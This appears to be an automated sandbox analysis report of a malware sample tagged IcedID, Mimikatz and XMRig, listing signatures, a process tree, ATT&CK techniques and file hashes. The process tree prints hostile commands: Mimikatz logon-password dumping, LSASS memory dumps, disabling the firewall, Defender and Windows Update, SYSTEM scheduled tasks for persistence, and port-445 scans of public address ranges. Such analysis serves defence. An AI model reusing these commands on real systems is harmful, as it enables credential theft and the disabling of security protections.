Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
11-01-2025 06:23
General
-
Target
2025-01-11_6366aea69eeaf1a49def0951d9ce5f33_hacktools_icedid_mimikatz.exe
-
Size
9.1MB
-
MD5
6366aea69eeaf1a49def0951d9ce5f33
-
SHA1
c00c06317865dbd67e171f9466143100e61f90d4
-
SHA256
acbe8832c4cd6b91e3c9628fc8358f6500083fced447f70be1e54a145261cbc8
-
SHA512
087b6fbd2d61e9d1e4d69408b892d3634a68b80a18e07c9cccb1021afd92a8944873db54bd2584af21a1d9f917d98b50ac64def44ca9b48bec9559c745cdb242
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30409) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\nbehzqchy\bfqlww.exe"C:\Windows\TEMP\nbehzqchy\bfqlww.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-11_6366aea69eeaf1a49def0951d9ce5f33_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-11_6366aea69eeaf1a49def0951d9ce5f33_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uuzvyssy\pmesiis.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\uuzvyssy\pmesiis.exeC:\Windows\uuzvyssy\pmesiis.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\uuzvyssy\pmesiis.exeC:\Windows\uuzvyssy\pmesiis.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tggeyyzfb\eymeuqibh\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\tggeyyzfb\eymeuqibh\wpcap.exeC:\Windows\tggeyyzfb\eymeuqibh\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tggeyyzfb\eymeuqibh\fuiegeqsm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tggeyyzfb\eymeuqibh\Scant.txt2⤵
-
C:\Windows\tggeyyzfb\eymeuqibh\fuiegeqsm.exeC:\Windows\tggeyyzfb\eymeuqibh\fuiegeqsm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tggeyyzfb\eymeuqibh\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tggeyyzfb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tggeyyzfb\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\tggeyyzfb\Corporate\vfshost.exeC:\Windows\tggeyyzfb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hcwibtmyc" /ru system /tr "cmd /c C:\Windows\ime\pmesiis.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hcwibtmyc" /ru system /tr "cmd /c C:\Windows\ime\pmesiis.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tuesyyviu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tuesyyviu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ybqcwyuem" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ybqcwyuem" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 776 C:\Windows\TEMP\tggeyyzfb\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 384 C:\Windows\TEMP\tggeyyzfb\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 1728 C:\Windows\TEMP\tggeyyzfb\1728.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 2556 C:\Windows\TEMP\tggeyyzfb\2556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 2720 C:\Windows\TEMP\tggeyyzfb\2720.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 3008 C:\Windows\TEMP\tggeyyzfb\3008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 684 C:\Windows\TEMP\tggeyyzfb\684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 3764 C:\Windows\TEMP\tggeyyzfb\3764.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 3852 C:\Windows\TEMP\tggeyyzfb\3852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 3920 C:\Windows\TEMP\tggeyyzfb\3920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 4000 C:\Windows\TEMP\tggeyyzfb\4000.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 4328 C:\Windows\TEMP\tggeyyzfb\4328.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 4584 C:\Windows\TEMP\tggeyyzfb\4584.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 4992 C:\Windows\TEMP\tggeyyzfb\4992.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 4744 C:\Windows\TEMP\tggeyyzfb\4744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 3664 C:\Windows\TEMP\tggeyyzfb\3664.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 1708 C:\Windows\TEMP\tggeyyzfb\1708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exeC:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe -accepteula -mp 4444 C:\Windows\TEMP\tggeyyzfb\4444.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tggeyyzfb\eymeuqibh\scan.bat2⤵
-
C:\Windows\tggeyyzfb\eymeuqibh\bhwbyshyn.exebhwbyshyn.exe TCP 181.215.0.1 181.215.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\fknvgk.exeC:\Windows\SysWOW64\fknvgk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\pmesiis.exe1⤵
-
C:\Windows\ime\pmesiis.exeC:\Windows\ime\pmesiis.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\pmesiis.exe1⤵
-
C:\Windows\ime\pmesiis.exeC:\Windows\ime\pmesiis.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.1MB
MD5893d3736316f2e4f5d374beca79f6e53
SHA1a402d285290800dc282d946a7d59258d7d946a37
SHA256a8b1fb4ee5466695bd4f01da4eff88dbdb4466dafcfe74865b08ed7b308105e5
SHA5125c20e782682edb4e02426af9233439f587d317512e36d24247232591fb2784135e62c506f417db4e3396168b66844c9d290a7cdb9132da22b7c09bb0b3c34e0f
-
Filesize
3.7MB
MD50a62914beaa3c04d061d15e46aa774ad
SHA1fe06aaacd2e767987fdd3d798fc4bbc164a7980d
SHA2567ac34d8dac0383b8b6425152e0cb12efb16f7d050110e2093b68a5568b387666
SHA51203fbe187d80a2c80c2164a2c3322ff8fbeddcfc44fd84e1439ef91035776b10acd47d124f9867c8b36ed37e4fcbfa1420591bf44843bc73c19a187d95be8639d
-
Filesize
7.5MB
